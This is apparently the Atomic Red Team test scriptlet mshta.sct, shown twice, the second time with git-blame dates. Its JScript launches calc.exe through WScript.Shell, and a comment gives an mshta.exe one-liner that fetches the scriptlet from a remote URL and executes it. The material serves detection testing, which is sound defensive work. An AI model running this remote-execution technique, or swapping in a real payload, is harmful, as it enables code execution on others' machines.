Windows/Payloads/mshta.sct

<?XML version="1.0"?>
<scriptlet>
  <!-- Test -->
  <!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/mshta.sct")).Exec();close(); -->

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	}

]]>
</script>

</scriptlet>
mshta 2018-01-16 08:56:26 -07:00			`<?XML version="1.0"?>`
			`<scriptlet>`
Update mshta.sct 2018-05-08 16:41:05 -06:00			`<!-- Test -->`
Update mshta.sct 2018-05-08 17:05:54 -06:00			`<!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/mshta.sct")).Exec();close(); -->`
mshta 2018-01-16 08:56:26 -07:00
			`<registration`
			`description="Bandit"`
			`progid="Bandit"`
			`version="1.00"`
			`classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"`
			`>`

			`</registration>`

			`<public>`
			`<method name="Exec"></method>`
			`</public>`
			`<script language="JScript">`
			`<![CDATA[`

			`function Exec()`
			`{`
Update mshta.sct 2018-05-08 16:41:05 -06:00			`var r = new ActiveXObject("WScript.Shell").Run("calc.exe");`
mshta 2018-01-16 08:56:26 -07:00			`}`

			`]]>`
			`</script>`

			`</scriptlet>`